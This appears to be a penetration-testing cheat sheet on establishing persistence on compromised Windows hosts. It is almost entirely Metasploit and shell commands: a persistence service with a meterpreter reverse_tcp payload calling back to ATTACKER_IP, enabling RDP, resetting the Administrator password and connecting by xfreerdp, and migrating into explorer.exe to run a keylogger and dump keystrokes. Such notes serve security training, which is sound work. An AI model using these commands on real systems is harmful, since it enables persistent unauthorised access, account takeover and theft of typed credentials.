Skip to content

Establishing Persistence On Windows

They are techniques that attackers use to keep access to system across restarts, changed credentials and other interruptions that could cut off their access.

Metasploit modules

exploit/windows/local/persistence_service

use exploit/windows/local/persistence_service

set payload windows/meterpreter/reverse_tcp

set SESSION SESSION_ID

run

Once this service is set up, the multi-handler module can be used to re-establish the connection with the target system.

use multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST ATTACKER_IP

run

LPORT and LHOST must be the same for both modules.

Enabling RDP

RDP uses TCP port 3389 by default.

RDP is disabled by default; however, there is an MSF exploit module to enable RDP on the Windows target.

post/windows/manage/enable_rdp

use post/windows/manage/enable_rdp

set SESSION SESSION_ID

run

# Check if RDP has been enabled on the target
db_nmap -sV -p 3389 TARGET_IP

# Go back to the session and change the password for the Administrator user (not recommended on a real scenario)
sessions 1

shell

# Change the password for the Administrator user
net user Administrator NEW_PASSWORD

# Connect to RDP
xfreerdp /u:administrator /p:NEW_PASSWORD /v:TARGET_IP

Automate the process with Metasploit

run getgui -e -u USER_NAME -p PASSWORD

Windows Keylogging

# Keylogging module works better with explorer.exe process
pgrep explorer
migrate EXPLORER_PID

# Start keylogger
keyscan_start

# Dump keystrokes
keyscan_dump

# Stop keylogger
keyscan_stop